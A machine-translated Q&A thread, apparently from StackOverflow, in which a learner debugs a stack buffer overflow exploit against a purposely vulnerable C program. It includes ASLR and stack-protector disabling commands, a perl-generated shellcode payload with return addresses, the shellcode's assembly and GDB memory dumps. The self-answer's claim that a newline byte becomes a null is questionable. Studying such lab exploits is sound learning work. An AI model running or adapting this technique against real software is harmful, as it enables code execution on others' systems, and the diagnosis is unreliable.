没有GDB就无法重现缓冲区溢出

时间:2016-02-12 14:33:53

标签: assembly x86 gdb buffer-overflow shellcode

我一直试图解决这个问题。我已经检查了一些类似问题的StackOverflow链接,但没有一个修复程序似乎对我有用。出于某种原因,我没有像我应该那样得到分段错误(如果我的漏洞利用代码不起作用),我的漏洞利用代码根本就不会产生错误。我最初的假设是perl代码以某种方式只生成了一点输出,因此不会溢出到堆栈上,但我通过将perl命令的输出传递给文件来证明这是错误的。

但是,我无法在GDB中重现此问题。根据我的理解,GDB禁用ASLR,但我已经通过以下命令在系统中暂时禁用了它(暂时)。我知道这个命令有效,因为我打印出变量& buff的地址,并且它不会在多次运行中发生变化。

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

我还在我的可执行文件上禁用了堆栈保护:

gcc -g -m32 -fno-stack-protector -z execstack exploit.c

正如我之前所说,我的漏洞利用在GDB中完美运行。这是我可利用的程序,我将向您展示我的漏洞利用代码。

exploit.c 

int checkFunc(char *c) {
    char buff[32];
    printf("0x%08x\n", &buff);
    strcpy(buff, c);
    if(strcmp(buff, "test") == 0) return 1;
    else return 0;
}

int main(int argc, char *argv[]) {
    int result = checkFunc(argv[1]);
    if(result == 1) printf("Access granted\n");
    else printf("Access denied\n");
    return 0;
}

[working]漏洞利用代码的GDB输出 

(gdb) set args "`perl -e 'print "\x90"x9 . "\x31\xD2\x31\xC9\x31\xDB\x52\x68\x70\x77\x6E\x0A\xB2\x04\x89\xE1\xB3\x01\xB0\x04\xCD\x80\xE9\xFB\xFF\xFF\xFF" . "\x30\xf6\xff\xbf"x5;'`"
(gdb) run
Starting program: /home/chris/exploit/a.out "`perl -e 'print "\x90"x9 . "\x31\xD2\x31\xC9\x31\xDB\x52\x68\x70\x77\x6E\x0A\xB2\x04\x89\xE1\xB3\x01\xB0\x04\xCD\x80\xE9\xFB\xFF\xFF\xFF" . "\x30\xf6\xff\xbf"x5;'`"
0xbffff630
pwn

定期输出漏洞利用代码 

chris@cb:~/exploit$ ./a.out $(perl -e 'print "\x90"x9 . "\x31\xD2\x31\xC9\x31\xDB\x52\x68\x70\x77\x6E\x0A\xB2\x04\x89\xE1\xB3\x01\xB0\x04\xCD\x80\xE9\xFB\xFF\xFF\xFF" . "\x60\xf6\xff\xbf"x5;')
0xbffff660
Access denied

是的,我已经考虑了返回地址的变化(GDB增加了额外的环境变量)。这就是为什么我通过打印程序中的返回地址来欺骗我,以便在不使用GDB的情况下知道确切的值是什么。

如果有人认为漏洞利用代码是错误的,我也会发布汇编代码。

xor    edx,edx   ;xor so we don't have to use a null terminator in our code
xor    ecx,ecx
xor    ebx,ebx
push   edx       ;push the null terminator to the stack
push   0xa6e7770 ;push our string pwn\n to the stack
mov    dl,0x4 
mov    ecx,esp
mov    bl,0x1
mov    al,0x4
int    0x80      ;print our string
jmp    eip - 1   ;keep on looping!

提前非常感谢!我已经被困在这几个小时了。而且你们知道,我已经写过这个可利用的程序来了解黑客中的缓冲区溢出:剥削的艺术。

1 个答案:

答案 0 :(得分:1)

对于今后遇到此问题的任何人......

我对程序的问题是我的缓冲区中的0x0A字符。出于某种原因,GDB将此视为一个简单的换行符,但在正常运行程序时,它被视为空字符。我通过将换行符更改为其他内容来解决问题。感谢您对Jester,EOF和Michael的帮助,感谢您引导我走向正确的方向,并帮助我编写更好的代码:)。

(gdb) x/32x &buff
0xbffff130:     0x90    0x90    0x31    0xd2    0x31    0xc9    0x31    0xdb
0xbffff138:     0x31    0xc0    0x52    0x68    0x70    0x77    0x6e    0x00
0xbffff140:     0x20    0xec    0xfc    0xb7    0x2d    0x86    0x04    0x08
0xbffff148:     0x64    0xf1    0xff    0xbf    0x00    0x00    0x00    0x00

如您所见,字节0x00在字节15处终止字符串,因此,我的数组的其余部分具有未初始化的值。

我假设程序认为我正在为命令行参数做一个实际的新行,但我们都知道情况并非如此;)。

要解决此问题,我只需替换换行符的另一个值。不幸的是,我不知道如何在不引起此问题的情况下将换行符合并到我的程序中。我想到了以下hacky解决方案来弥补。将换行符的值减去1(0x9)放入寄存器,然后调用寄存器上的inc操作码,并将其推入堆栈。

相关问题
最新问题